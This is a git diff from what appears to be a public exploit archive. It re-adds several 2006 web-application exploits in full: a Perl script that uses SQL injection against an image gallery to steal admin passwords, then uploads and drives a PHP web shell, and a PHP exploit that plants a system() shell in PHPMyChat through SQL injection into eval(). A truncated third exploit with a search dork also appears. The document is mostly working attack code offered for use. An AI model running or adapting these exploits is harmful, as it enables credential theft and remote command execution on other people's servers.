-	}
-	
-	close($sock);
-	return $data;
-}
-
-sub randstring(\$,\$) {
-	my $min = shift;
-	my $max = shift;
-
-	my $length = int( (rand(65535)%($max-$min+1))+$min);
-	my $ret = "";
-	for(my $i = 0; $i < $length; $i++)
-	{
-		my $w = int(rand(3));
-		if($w == 0)
-		{
-			$ret .= chr(97 + int(rand(26)));
-		}
-		elsif($w == 1)
-		{
-			$ret .= chr(65 + int(rand(26)));
-		}
-		else
-		{
-			$ret .= chr(48 + int(rand(10)));
-		}
-	}
-
-	return $ret;
-}
-
-
-sub usage() {
-	printf "usage: %s   [user(optional)] [password(optional)] [shell path without trailing / (optional)]\n", $0;
-	printf "exemple: %s www.site.com/csig/ 80\n", $0;
-	exit;
-}
-
-
-sub urlEncode {
-    my ($string) = @_;
-    $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
-    return $string;
-}
-
-# milw0rm.com [2006-04-04]
+#!/usr/bin/perl
+###############################################################################
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License
+# as published by the Free Software Foundation; either version 2
+# of the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
+###############################################################################
+
+# =====================================================
+# $ crappy_syntax.pl localhost/csig/ 80
+#
+# :: crafty syntax image gallery <= 3.1g
+# :: by undefined1_ @ bash-x.net/undef/
+# :: note: this works only on mysql >= 4.0
+#
+#
+# [+] creating user account
+# [+]		user: 98fe56123
+#			password: 7652L4M3l39q
+#			email: SehswdSx0E@hotmail.com
+# [+] user '98fe56123' with password '7652L4M3l39q' registered
+# [+] logged in as 98fe56123
+# [+] projectid is 2
+# [-] no admin found for this projectid, trying the username 'admin'
+# [+] admin username: 'admin'
+# [+] admin password: '1111'
+# [+] logged in as 'admin'
+# [+] getting shell location
+# [+] shell @ 'userimages/1/18d76bcbc6f2.php'
+# [+] have phun?
+#
+# localhost$ uname
+# Linux
+# localhost$ whoami
+# nobody
+# =====================================================
+
+use strict; 
+use IO::Socket;
+
+$| = 1;
+print ":: crafty syntax image gallery <= 3.1g\n";
+print ":: by undefined1_ @ bash-x.net/undef/\n";
+print ":: note: this works only on mysql >= 4.0\n\n\n";
+
+my $website = shift || usage();
+my $port = shift || usage();
+my $user = shift;
+my $password = shift;
+my $location = shift;
+
+
+
+my $path = "/";
+my $server = $website;
+if(index($website, "/") != -1)
+{
+	$path = substr($website, index($website, "/"));
+	$server = substr($website, 0, index($website, "/"));
+	if(substr($path, length($path)-1) ne "/")
+	{
+		$path .= "/";
+	}
+}
+if($location eq "")
+{
+	if($user eq "" && $password eq "")
+	{
+		print "[+] creating user account\n";
+		$user = randstring(8,12);
+		$password = randstring(8,12);
+		my $email = randstring(8,12)."\@hotmail.com";
+		printf("[+]\tuser: %s\n", $user);
+		printf("\tpassword: %s\n", $password);
+		printf("\temail: %s\n", $email);
+		register($server, $path, $user, $user, $password, $email);
+	}
+
+	my $cookies = login($server, $port, $path, $user, $password);
+	my $projectid = get_projectid($server, $port, $path, $cookies);
+	my @admin = send_payload($server, $port, $path, $cookies, $projectid);
+
+	$cookies = login($server, $port, $path, $admin[0], $admin[1]);
+	upload_shell($server, $port, $path, $cookies, $projectid);
+	$location = get_shell_location($server,$port,$path,$cookies);
+}
+
+check_shell($server, $port, $path, $location);
+printf("[+] have phun?\n\n");
+my $command;
+while(1) 
+{
+	print $server."\$ ";
+	while() 
+	{
+		$command = $_;
+		chomp($command);
+		last;
+	}
+	do_shell($server,$port,$path,$location,$command);
+}
+
+
+sub send_payload(\$,\$,\$,\$,\$) {
+	my $server = shift;
+	my $port = shift;
+	my $path = shift;
+	my $cookies = shift;
+	my $projectid = shift;
+	my $shellcode;
+
+	$shellcode  = "\x61\x6e\x64\x20\x31\x3d\x30\x20\x75\x6e\x69\x6f\x6e\x20";
+	$shellcode .= "\x61\x6c\x6c\x20\x73\x65\x6c\x65\x63\x74\x20\x31\x2c\x32";
+	$shellcode .= "\x2c\x33\x2c\x34\x2c\x35\x2c\x75\x73\x65\x72\x69\x64\x20";
+	$shellcode .= "\x61\x73\x20\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e";
+	$shellcode .= "\x2c\x37\x2c\x38\x2c\x39\x2c\x30\x2c\x31\x2c\x32\x2c\x33";
+	$shellcode .= "\x2c\x34\x2c\x35\x2c\x35\x20\x66\x72\x6f\x6d\x20\x67\x61";
+	$shellcode .= "\x6c\x6c\x65\x72\x79\x5f\x61\x63\x63\x65\x73\x73\x20\x77";
+	$shellcode .= "\x68\x65\x72\x65\x20\x67\x61\x6c\x6c\x65\x72\x79\x69\x64";
+	$shellcode .= "\x3d";
+	$shellcode .= $projectid;
+	$shellcode .= "\x20\x61\x6e\x64\x20\x70\x65\x72\x6d\x69\x73\x73\x69\x6f";
+	$shellcode .= "\x6e\x73\x3d\x43\x4f\x4e\x43\x41\x54\x28\x30\x78\x34\x36";
+	$shellcode .= "\x35\x35\x34\x63\x34\x63\x29\x20\x2d\x2d";
+
+	my $query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\r\n";
+	$query .= "Host: $server\r\n";
+	$query .= "User-Agent: Mozilla/5.0\r\n";
+	$query .= "Connection: close\r\n";
+	$query .= $cookies;
+	$query .= "\r\n";
+	my $data = sendpacket($server, $port, $query);
+	if($data !~ /photo_captions\[1\] = "/)
+	{
+		print "[-] no admin found for this projectid, trying the username 'admin'\n";
+		$shellcode = "and 1=0 union all select 1,username as image,3,4,5,password AS description,7,8,9,10,11,12,13,14,15,16 from gallery_users where username=CONCAT(0x61646d696e) --";
+		$query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\r\n";
+		$query .= "Host: $server\r\n";
+		$query .= "User-Agent: Mozilla/5.0\r\n";
+		$query .= "Connection: close\r\n";
+		$query .= $cookies;
+		$query .= "\r\n";
+		my $data = sendpacket($server, $port, $query);
+		if($data !~ /photo_captions\[1\] = "/ || $data !~ /photo_urls\[1\] = "/)
+		{
+			print "[-] exploit failed\n";
+			exit;
+		}
+		my $index1 = index($data, "photo_captions[1] = \" ") + 22;
+		my $index2 = index($data, "\"", $index1);
+		my $passwd = substr($data, $index1, $index2-$index1);
+
+		$index1 = index($data, "photo_urls[1] = \"") + 17;
+		$index2 = index($data, "\"", $index1);
+		$data = substr($data, $index1, $index2-$index1);
+		$index1 = rindex($data, "/") + 1;
+		my $username = substr($data, $index1);
+
+
+		print "[+] admin username: '$username'\n";
+		print "[+] admin password: '$passwd'\n";
+
+		my @ret;
+		push(@ret, $username);
+		push(@ret, $passwd);
+		return @ret;
+	}
+	my $index1 = index($data, "photo_captions[1] = \" ") + 22;
+	my $index2 = index($data, "\"", $index1);
+	my $uid = substr($data, $index1, $index2-$index1);
+	print "[+] admin uid: '$uid'\n";
+
+
+
+
+
+	$shellcode = "and 1=0 union all select 1,username as image,3,4,5,password AS description,7,8,9,10,11,12,13,14,15,16 from gallery_users where recno=".$uid." --";
+	$query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\r\n";
+	$query .= "Host: $server\r\n";
+	$query .= "User-Agent: Mozilla/5.0\r\n";
+	$query .= "Connection: close\r\n";
+	$query .= $cookies;
+	$query .= "\r\n";
+	my $data = sendpacket($server, $port, $query);
+	if($data !~ /photo_captions\[1\] = "/ || $data !~ /photo_urls\[1\] = "/)
+	{
+		print "[-] exploit failed (mysql < 4 ?)\n";
+		exit;
+	}
+	$index1 = index($data, "photo_captions[1] = \" ") + 22;
+	$index2 = index($data, "\"", $index1);
+	my $passwd = substr($data, $index1, $index2-$index1);
+
+	$index1 = index($data, "photo_urls[1] = \"") + 17;
+	$index2 = index($data, "\"", $index1);
+	$data = substr($data, $index1, $index2-$index1);
+	$index1 = rindex($data, "/") + 1;
+	my $username = substr($data, $index1);
+
+
+	print "[+] admin username: '$username'\n";
+	print "[+] admin password: '$passwd'\n";
+
+	my @ret;
+	push(@ret, $username);
+	push(@ret, $passwd);
+	return @ret;
+}
+
+
+sub do_shell(\$,\$,\$,\$,\$) {
+	my $server = shift;
+	my $port = shift;
+	my $path = shift;
+	my $location = shift;
+	my $command = shift;
+
+	my $d = "c=".$command;
+	my $query = "POST ".$path.$location." HTTP/1.1\r\n";
+	$query .= "Content-Type: application/x-www-form-urlencoded\r\n";
+	$query .= "Host: $server\r\n";
+	$query .= "User-Agent: Mozilla/5.0\r\n";
+	$query .= "Connection: close\r\n";
+	$query .= "Content-Length: ".length($d)."\r\n";
+	$query .= "\r\n";
+	$query .= $d;
+	
+	my $data = sendpacket($server, $port, $query);
+	my $index = index($data, "\r\n\r\n");
+	if($index >= 0)
+	{
+		print substr($data, $index+4)."\n";
+	}
+	else
+	{
+		print "[-] shell error?\n";
+	}
+}
+
+sub check_shell(\$,\$,\$,\$) {
+	my $server = shift;
+	my $port = shift;
+	my $path = shift;
+	my $location = shift;
+
+	
+	my $query = "GET ".$path.$location." HTTP/1.1\r\n";
+	$query .= "Host: $server\r\n";
+	$query .= "User-Agent: Mozilla/5.0\r\n";
+	$query .= "Connection: close\r\n";
+	$query .= "\r\n";
+	my $data = sendpacket($server, $port, $query);
+
+	if($data !~ /HTTP\/1.1 200 OK/)
+	{
+		print "[-] shell not found\n";
+		print "[-] try ".$server.$path."/userimages/\n";
+		exit;
+	}
+}
+
+sub get_shell_location(\$,\$,\$,\$) {	
+	print "[+] getting shell location\n";
+	my $server = shift;
+	my $port = shift;
+	my $path = shift;
+	my $cookies = shift;
+	my $shellcode;
+
+	$shellcode  = "\x61\x6e\x64\x20\x69\x6d\x61\x67\x65\x20\x4c\x49\x4b\x45\x20\x43";
+	$shellcode .= "\x4f\x4e\x43\x41\x54\x28\x30\x78\x32\x35\x32\x65\x37\x30\x36\x38";
+	$shellcode .= "\x37\x30\x29\x20\x6f\x72\x64\x65\x72\x20\x62\x79\x20\x72\x65\x63";
+	$shellcode .= "\x6e\x6f\x20\x64\x65\x73\x63\x20\x6c\x69\x6d\x69\x74\x20\x31\x20";
+	$shellcode .= "\x2d\x2d";
+
+	
+	my $query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\r\n";
+	$query .= "Host: $server\r\n";
+	$query .= "User-Agent: Mozilla/5.0\r\n";
+	$query .= "Connection: close\r\n";
+	$query .= $cookies;
+	$query .= "\r\n";
+	my $data = sendpacket($server, $port, $query);
+	if($data =~ /There are no photos in this gallery/)
+	{
+		print "[-] shell not found\n";
+		print "[-] try ".$server.$path."/userimages/\n";
+		exit;
+	}
+
+	my $index1 = index($data, "photo_urls[1] = \"") + 17;
+	my $index2 = index($data, "\"", $index1);
+	my $location = substr($data, $index1, $index2-$index1);
+	print "[+] shell @ '".$location."'\n";
+	return $location;
+}
+
+sub get_projectid(\$,\$,\$,\$) {
+	my $server = shift;
+	my $port = shift;
+	my $path = shift;
+	my $cookies = shift;
+	
+	my $query = "GET ".$path."imagemenu.php?html=menu.tpl HTTP/1.1\r\n";
+	$query .= "Host: $server\r\n";
+	$query .= "User-Agent: Mozilla/5.0\r\n";
+	$query .= "Connection: close\r\n";
+	$query .= $cookies;
+	$query .= "\r\n";
+	my $data = sendpacket($server, $port, $query);
+	my $projectid;
+	if($data =~ /\?projectid=([0-9]*)/)
+	{
+		$projectid = $1;
+	}
+	else
+	{
+		print "[-] no projectid found";
+		exit;
+	}
+
+	print "[+] projectid is '$projectid'\n";
+	return $projectid;
+}
+
+sub upload_shell(\$,\$,\$,\$,\$) {
+	my $server = shift;
+	my $port = shift;
+	my $path = shift;
+	my $cookies = shift;
+	my $projectid = shift;
+	
+	my $query = "GET ".$path."newimage.php?projectid=".$projectid." HTTP/1.1\r\n";
+	$query .= "Host: $server\r\n";
+	$query .= "User-Agent: Mozilla/5.0\r\n";
+	$query .= "Connection: close\r\n";
+	$query .= $cookies;
+	$query .= "\r\n";
+	my $data = sendpacket($server, $port, $query);
+	if($data =~ /Access denied.../)
+	{
+		print "[-] no admin privileges (mysql < 4.0 ?)\n";
+		exit;
+	}
+
+	my $shell = "";
+
+	my $boundary = "-----------------------------220162907215434";
+	my $post = "--".$boundary."\r\n";
+	$post .= "Content-Disposition: form-data; name=\"projectid\"\r\n\r\n";
+	$post .= $projectid."\r\n";
+
+	$post .= "--".$boundary."\r\n";
+	$post .= "Content-Disposition: form-data; name=\"A_MONTH\"\r\n\r\n";
+	$post .= "03\r\n";
+
+	$post .= "--".$boundary."\r\n";
+	$post .= "Content-Disposition: form-data; name=\"A_DAY\"\r\n\r\n";
+	$post .= "26\r\n";
+
+	$post .= "--".$boundary."\r\n";
+	$post .= "Content-Disposition: form-data; name=\"A_YEAR\"\r\n\r\n";
+	$post .= "2006\r\n";
+
+	$post .= "--".$boundary."\r\n";
+	$post .= "Content-Disposition: form-data; name=\"fullimage\"; filename=\"my_image.jpg\"\r\n";
+	$post .= "Content-Type: text/plain\r\n\r\n";
+	$post .= $shell."\r\n";
+
+	$post .= "--".$boundary."\r\n";
+	$post .= "Content-Disposition: form-data; name=\"description\"\r\n\r\n";
+	$post .= "another image\r\n";
+
+	$post .= "--".$boundary."\r\n";
+	$post .= "Content-Disposition: form-data; name=\"ext\"\r\n\r\n";
+	$post .= ".php\r\n";
+
+	$post .= "--".$boundary."\r\n";
+	$post .= "Content-Disposition: form-data; name=\"feature__".$projectid."\"\r\n\r\n";
+	$post .= "Y\r\n";
+
+	$post .= "--".$boundary."\r\n";
+	$post .= "Content-Disposition: form-data; name=\"addnow\"\r\n\r\n";
+	$post .= "ADD\r\n";
+
+	$post .= "--".$boundary."--\r\n";
+
+	my $query  = "POST ".$path."newimage.php?projectid=".$projectid." HTTP/1.1\r\n";
+	$query .= "Content-Type: multipart/form-data; boundary=".$boundary."\r\n";
+	$query .= "Host: $server\r\n";
+	$query .= "User-Agent: Mozilla/5.0\r\n";
+	$query .= "Connection: close\r\n";
+	$query .= $cookies;
+	$query .= "Content-Length: ".length($post)."\r\n";
+	$query .= "\r\n";
+	$query .= $post;
+
+	sendpacket($server, $port, $query);
+}
+
+sub login(\$,\$,\$,\$,\$) {
+	my $server = shift;
+	my $port = shift;
+	my $path = shift;
+	my $username = shift;
+	my $password = shift;
+
+	my $d = "whattodo=login&myusername=".$username."&mypassword=".$password;
+	my $query = "POST ".$path."index.php HTTP/1.1\r\n";
+	$query .= "Content-Type: application/x-www-form-urlencoded\r\n";
+	$query .= "Host: $server\r\n";
+	$query .= "User-Agent: Mozilla/5.0\r\n";
+	$query .= "Connection: close\r\n";
+	$query .= "Content-Length: ".length($d)."\r\n";
+	$query .= "\r\n";
+	$query .= $d;
+
+	my $data = sendpacket($server, $port, $query);
+	if($data =~ /Your Name:<\/td>= 0)
+	{
+		my $index2 = index($data, "Set-Cookie: ") + 12;
+		my $index3 = index($data, "\r\n", $index2);
+		$cookies = "Cookie: ".substr($data, $index2, $index3-$index2+2);
+	}
+	
+	print "[+] logged in as '$username'\n";
+	return $cookies;
+}
+
+sub register(\$, \$, \$, \$, \$, \$, \$) {
+	my $server = shift;
+	my $path = shift;
+	my $name = shift;
+	my $user = shift;
+	my $password = shift;
+	my $email = shift;
+
+	my $d = "action=register&emailadd=".$email."&newname=".$name."&newusername=".$user."&newpassword=".$password;
+	my $query = "POST ".$path."lostsheep.php HTTP/1.1\r\n";
+	$query .= "Content-Type: application/x-www-form-urlencoded\r\n";
+	$query .= "Host: $server\r\n";
+	$query .= "User-Agent: Mozilla/5.0\r\n";
+	$query .= "Connection: close\r\n";
+	$query .= "Content-Length: ".length($d)."\r\n";
+	$query .= "\r\n";
+	$query .= $d;
+
+	my $data = sendpacket($server, $port, $query);
+	if($data =~ /
  • Sorry the username you entered <\/b> is already taken.. try again/)
+	{
+		print "[-] failed: username taken\n";
+		exit;
+	}
+	if($data =~ /you did not enter in a/)
+	{
+		print "[-] failed\n";
+		exit;
+	}
+	print "[+] user '$user' with password '$password' registered\n";
+}
+
+sub sendpacket(\$,\$,\$) {
+	my $server = shift;
+	my $port = shift;
+	my $request = shift;
+
+	my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => $port) or die "[-] Could not connect to $server:$port $!\n";
+	print $sock "$request";
+
+	
+	my $data = "";
+	my $answer;
+	while($answer = <$sock>)
+	{
+		$data .= $answer;
+	}
+	
+	close($sock);
+	return $data;
+}
+
+sub randstring(\$,\$) {
+	my $min = shift;
+	my $max = shift;
+
+	my $length = int( (rand(65535)%($max-$min+1))+$min);
+	my $ret = "";
+	for(my $i = 0; $i < $length; $i++)
+	{
+		my $w = int(rand(3));
+		if($w == 0)
+		{
+			$ret .= chr(97 + int(rand(26)));
+		}
+		elsif($w == 1)
+		{
+			$ret .= chr(65 + int(rand(26)));
+		}
+		else
+		{
+			$ret .= chr(48 + int(rand(10)));
+		}
+	}
+
+	return $ret;
+}
+
+
+sub usage() {
+	printf "usage: %s   [user(optional)] [password(optional)] [shell path without trailing / (optional)]\n", $0;
+	printf "exemple: %s www.site.com/csig/ 80\n", $0;
+	exit;
+}
+
+
+sub urlEncode {
+    my ($string) = @_;
+    $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
+    return $string;
+}
+
+# milw0rm.com [2006-04-04]
diff --git a/platforms/php/webapps/1646.php b/platforms/php/webapps/1646.php
index 68b628ee9..186bff7e3 100755
--- a/platforms/php/webapps/1646.php
+++ b/platforms/php/webapps/1646.php
@@ -1,199 +1,199 @@
-#!/usr/bin/php -q -d short_open_tag=on
-query("INSERT INTO ".C_MSG_TBL." VALUES ($T, '$R', 'SYS exit', '', ".time().", '', 'sprintf(L_EXIT_ROM, \"".special_char($U,$Latin1,1)."\")')");
-# $kicked = 3;
-# }
-# ...
-#
-# have a look to "T" argument, it is not sanitized before to be used in our
-# INSERT query, so we can inject all the values we want and store them
-# in the c_messages table. Also it is not delimited by quotes & we do not need
-# quotes to extend the query, so this works regardless of magic_quotes_gpc settings
-#
-# sprintf() should be passed to an eval() near line 197:
-#
-# ...
-# // "System" messages
-#		else
-#		{
-#		if ($Dest == " *")
-#			{
-#				$Message = "[".L_ANNOUNCE."] ".$Message;
-#			}
-#			else
-#			{
-#				if ($Dest != "") $NewMsg .= ">[".htmlspecialchars(stripslashes($Dest))."] ";
-#				$Message = str_replace("$","\\$",$Message);	// avoid '$' chars in nick to be parsed bellow
-#				eval("\$Message = $Message;");
-#			};
-#			$NewMsg .= "".$Message."
    ";
-#		};
-# ...
-#
-# but what happen if we inject a system() call instead and if we simulate
-# to be the SYS user? :)
-#
-# this is 0day, enjoy it
-
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-function make_seed()
-{
-   list($usec, $sec) = explode(' ', microtime());
-   return (float) $sec + ((float) $usec * 100000);
-}
-
-
-$host=$argv[1];
-$path=$argv[2];
-$action=$argv[3];
-$cmd="";$port=80;$proxy="";
-
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-
-#step 1 -> SQL Injection, works regardsless of any magic_quotes_gpc seetings, it is an INSERT INTO query
-#let's store a shell in c_messages table
-$L="L=english";
-$U="";
-
-$T ="0,"; //type
-$T.="CHAR(68,101,102,97,117,108,116),"; //room (Default)
-$T.="CHAR(83,89,83,32,101,110,116,101,114),"; //username (SYS enter)
-$T.="0,";//latin1
-$T.="9999999999,";//m_time
-$T.="1,";//address
-
-//message (our encoded shell -> system($_GET[cmd]);die ) ,if system() is disabled, reencode a new one with passthru() or exec()
-//u can use an unlimited number of chars for this
-$T.="CHAR(115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,59,100,105,101))/*";
-
-$T="T=".urlencode($T);
-
-for ($i=0; $i<=1; $i++) //redo
-{
-srand(make_seed());
-$anumber = rand(1,99999);
-$R="R=Default".$anumber; //random, it must be different from the previous one
-$packet ="GET ".$p."chat/messagesL.php3?$L&$U&$T&$R HTTP/1.0\r\n";
-$packet.="X-Forwarded-For: suntzuuuuuuu\r\n";
-$packet.="User-Agent: Googlebot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-//debug
-//echo quick_dump($packet);
-sendpacketii($packet);
-}
-sleep(2);
-#step 2 -> shell is passed to an eval(), so we launch commands
-$packet ="GET ".$p."chat/messagesL.php3?L=english&R=Default&N=9999&T=0&U=SYS%20enter&cmd=".$cmd." HTTP/1.0\r\n";
-$packet.="User-Agent: Googlebot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-//debug
-//echo quick_dump($packet);
-sendpacketii($packet);
-echo $html;
-?>
-
-# milw0rm.com [2006-04-05]
+#!/usr/bin/php -q -d short_open_tag=on
+query("INSERT INTO ".C_MSG_TBL." VALUES ($T, '$R', 'SYS exit', '', ".time().", '', 'sprintf(L_EXIT_ROM, \"".special_char($U,$Latin1,1)."\")')");
+# $kicked = 3;
+# }
+# ...
+#
+# have a look to "T" argument, it is not sanitized before to be used in our
+# INSERT query, so we can inject all the values we want and store them
+# in the c_messages table. Also it is not delimited by quotes & we do not need
+# quotes to extend the query, so this works regardless of magic_quotes_gpc settings
+#
+# sprintf() should be passed to an eval() near line 197:
+#
+# ...
+# // "System" messages
+#		else
+#		{
+#		if ($Dest == " *")
+#			{
+#				$Message = "[".L_ANNOUNCE."] ".$Message;
+#			}
+#			else
+#			{
+#				if ($Dest != "") $NewMsg .= ">[".htmlspecialchars(stripslashes($Dest))."] ";
+#				$Message = str_replace("$","\\$",$Message);	// avoid '$' chars in nick to be parsed bellow
+#				eval("\$Message = $Message;");
+#			};
+#			$NewMsg .= "".$Message."
    ";
+#		};
+# ...
+#
+# but what happen if we inject a system() call instead and if we simulate
+# to be the SYS user? :)
+#
+# this is 0day, enjoy it
+
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+function make_seed()
+{
+   list($usec, $sec) = explode(' ', microtime());
+   return (float) $sec + ((float) $usec * 100000);
+}
+
+
+$host=$argv[1];
+$path=$argv[2];
+$action=$argv[3];
+$cmd="";$port=80;$proxy="";
+
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+
+#step 1 -> SQL Injection, works regardsless of any magic_quotes_gpc seetings, it is an INSERT INTO query
+#let's store a shell in c_messages table
+$L="L=english";
+$U="";
+
+$T ="0,"; //type
+$T.="CHAR(68,101,102,97,117,108,116),"; //room (Default)
+$T.="CHAR(83,89,83,32,101,110,116,101,114),"; //username (SYS enter)
+$T.="0,";//latin1
+$T.="9999999999,";//m_time
+$T.="1,";//address
+
+//message (our encoded shell -> system($_GET[cmd]);die ) ,if system() is disabled, reencode a new one with passthru() or exec()
+//u can use an unlimited number of chars for this
+$T.="CHAR(115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,59,100,105,101))/*";
+
+$T="T=".urlencode($T);
+
+for ($i=0; $i<=1; $i++) //redo
+{
+srand(make_seed());
+$anumber = rand(1,99999);
+$R="R=Default".$anumber; //random, it must be different from the previous one
+$packet ="GET ".$p."chat/messagesL.php3?$L&$U&$T&$R HTTP/1.0\r\n";
+$packet.="X-Forwarded-For: suntzuuuuuuu\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+//debug
+//echo quick_dump($packet);
+sendpacketii($packet);
+}
+sleep(2);
+#step 2 -> shell is passed to an eval(), so we launch commands
+$packet ="GET ".$p."chat/messagesL.php3?L=english&R=Default&N=9999&T=0&U=SYS%20enter&cmd=".$cmd." HTTP/1.0\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+//debug
+//echo quick_dump($packet);
+sendpacketii($packet);
+echo $html;
+?>
+
+# milw0rm.com [2006-04-05]
diff --git a/platforms/php/webapps/1647.php b/platforms/php/webapps/1647.php
index 7f7738868..c8b2ed687 100755
--- a/platforms/php/webapps/1647.php
+++ b/platforms/php/webapps/1647.php
@@ -1,207 +1,207 @@
-#!/usr/bin/php -q -d short_open_tag=on
- works with magic_quotes_gpc=Off\r\n\r\n";
-echo "dork: intext:\"2000-2001 The phpHeaven Team\" -sourceforge\r\n\r\n";
-
-if ($argc<4) {
-echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to PHPMyChat\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /phpmychat/ cat ./config/config.lib.php\r\n";
-echo "php ".$argv[0]." localhost /phpmychat/ ls -la -p81\r\n";
-echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
-die;
-}
-
-# explaination:
-#
-# only modified this one:
-#
-# http://retrogod.altervista.org/phpmychat_0145_xpl.html
-#
-# actually I tested this package:
-#
